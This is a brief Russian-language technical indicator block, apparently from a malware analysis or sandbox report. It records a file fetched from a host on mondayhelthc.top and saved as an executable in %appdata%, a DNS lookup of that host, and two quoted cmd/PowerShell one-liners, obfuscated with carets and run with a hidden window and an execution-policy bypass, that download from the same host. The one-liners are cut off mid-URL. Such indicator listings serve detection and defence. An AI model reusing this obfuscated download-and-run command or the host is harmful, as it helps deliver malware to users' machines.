Техническая информация
- http://mondayhelthc.top/read.php?f=0.dat как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /c "PowER^SH^elL^.Ex^e^ ^-^ex^EC^UTi^o^n^PoLi^Cy ^B^Ypa^SS -nOp^r^O^FIle -^W^Ind^OW^styL^E h^ID^dE^N^ ^(Ne^W^-^obJEct SyS^TEM^.nEt.W^EbClIeNt).DowNl^oAdFI^LE('http://monda...
- DNS ASK mo####helthc.top
- '<SYSTEM32>\cmd.exe' /c "PowER^SH^elL^.Ex^e^ ^-^ex^EC^UTi^o^n^PoLi^Cy ^B^Ypa^SS -nOp^r^O^FIle -^W^Ind^OW^styL^E h^ID^dE^N^ ^(Ne^W^-^obJEct SyS^TEM^.nEt.W^EbClIeNt).DowNl^oAdFI^LE('http://monda...' (со скрытым окном)